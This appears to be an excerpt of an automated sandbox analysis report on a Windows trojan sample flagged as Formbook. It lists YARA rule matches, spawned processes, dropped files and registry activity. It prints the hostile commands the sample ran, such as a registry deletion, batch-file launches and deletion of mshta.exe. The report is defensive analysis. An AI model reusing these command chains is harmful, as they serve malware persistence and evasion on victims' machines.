          Source: Form_TT_EUR57,890.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Fdhlajk.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Fdhlajk.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
          Source: Form_TT_EUR57,890.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000003.362637084.0000000002DC4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000003.437534855.0000000002DA8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000003.362921408.0000000002D88000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000003.465981030.0000000002DA8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000003.465812677.0000000002DE4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\Public\Libraries\kjalhdF.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@32/10@29/10
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6228:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_01
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: Form_TT_EUR57,890.exe | ReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File read: C:\Users\user\Desktop\Form_TT_EUR57,890.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Form_TT_EUR57,890.exe 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe'
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
